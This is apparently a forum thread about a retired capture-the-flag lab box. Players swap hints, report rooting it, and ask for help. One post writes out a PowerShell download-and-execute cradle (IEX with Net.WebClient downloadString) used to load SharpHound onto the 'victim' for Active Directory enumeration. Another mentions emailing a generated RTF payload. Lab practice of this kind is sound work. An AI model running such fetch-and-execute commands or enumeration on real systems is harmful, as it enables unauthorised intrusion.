@evandrix said:
yep, i’ve read through that.
it seems like the “document you have” != the output of my live ps1 queries viap****v**w
Possibly, but if you’ve logged in as the user C*, did you enumerate the user T* account first?
@evandrix said:
yep, i’ve read through that.
it seems like the “document you have” != the output of my live ps1 queries viap****v**w
Possibly, but if you’ve logged in as the user C*, did you enumerate the user T* account first?
Rooted thanks to a hint to stop being a dummy . I’m sad to see this one go into retirement.
This was a great box and representative of cracking the perimeter into a real world environment. I definitely added some cool techniques and tools into my arsenal thanks to this challenge.
<<< redacted - rooted!!! >>>
<<< redacted - rooted!!! >>>
@whipped said:
@rireoubli said:
Yay, finally got root on this one as well! It was a very good one, thanks to the creator.And I’d like to share the hint that made it for me when I was stuck for so long:
login-logout might help you
Thank you, thank you, thank you.
Thank you, thank you, thank you,Thank you, thank you, thank you.
hey all,
I know that this machine is old and just for the sake of education
I have reached the part where i download SharpHound.ps1 on victim using
IEX(New-Object Net.WebClient).downloadString(‘’)
Then when i
Invoke-BloodHound -CollectionMethod All
the shell hangs and nothing happens
any help on what may be causing the problem
Hi, were you able to resolve this? I am using sendemail, it works fine for sending non rtf files that are about 67 bytes, but the generated rtf file is 5-6 KB, and email server only sends acknowledgement TCP packet to the first segment of the msg and never to the rest, that’s why sending this attachment fails. Tried other email clients with same behavior. Looks like either a network or email server size limitation issue. Anyone had any luck recently?